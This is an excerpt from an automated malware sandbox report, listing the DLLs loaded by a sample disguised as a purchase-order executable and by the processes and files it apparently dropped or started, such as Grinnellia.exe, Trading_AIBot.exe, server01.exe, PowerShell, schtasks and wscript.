                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: drprov.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: browcli.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ntshrui.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc6.dll
